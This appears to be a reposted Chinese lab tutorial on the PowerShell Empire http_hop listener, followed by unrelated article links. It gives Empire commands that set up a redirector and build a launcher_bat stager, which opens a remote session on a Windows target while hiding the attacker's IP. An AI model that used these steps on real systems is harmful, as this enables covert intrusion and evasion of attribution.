zoukankan
html css js c++ java
使用PowerShell Empire(http_hop)隐藏IP
在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。
与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。
在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。
在下图中,您也可以看到我们的ubuntu的IP
。
现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:
uselistener http
execute
现在,输入以下命令启动http_hop侦听器:
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。
执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:
现在,您可以在下图中看到我们激活了两个侦听器:
让我们通过键入以下命令来启动stager
:
usestager windows/launcher_bat
set Listener http_hop
execute
在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。
总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。
查看全文
相关阅读:
python基础——列表生成式
python基础——迭代
python基础——切片
python基础——递归函数
python基础——函数的参数
python基础——使用dict和set
python基础——使用list和tuple
python基础——字符串和编码
堆——神奇的优先队列(下)
堆——神奇的优先队列(上)
原文地址:https://www.cnblogs.com/sup3rman/p/13725093.html
最新文章
hadoop job解决大数据量关联时数据倾斜的一种办法
Hive中如何快速的复制一张分区表(包括数据)
sql server第三方产品
【0.3】mysql复制的日常管理维护,mysql复制常见问题处理
(5.5)mysql高可用系列——MySQL半同步复制(实践)
(5.4)mysql高可用系列——MySQL异步复制(实践)
(5.3)mysql高可用系列——mysql复制之复制的参数
linux下显示完整路径,linux下显示绝对路径
【0.2】【MySQL】常用监控指标及监控方法(转)
mysql 构造连续的日期
热门文章
mysql拆分逗号一列变多行
IDEA设置syso快捷键输出System.out.println();
linux主机555、644、666、755、777权限详解
Spring AOP的实现原理
Spring学习之AOP详解
Spring 学习之AOP
使用CMQ和SCF实现邮件发送
搭建微信订阅号后台服务
redis入门之jedis
搭建Discuz论坛
Copyright © 2011-2022 走看看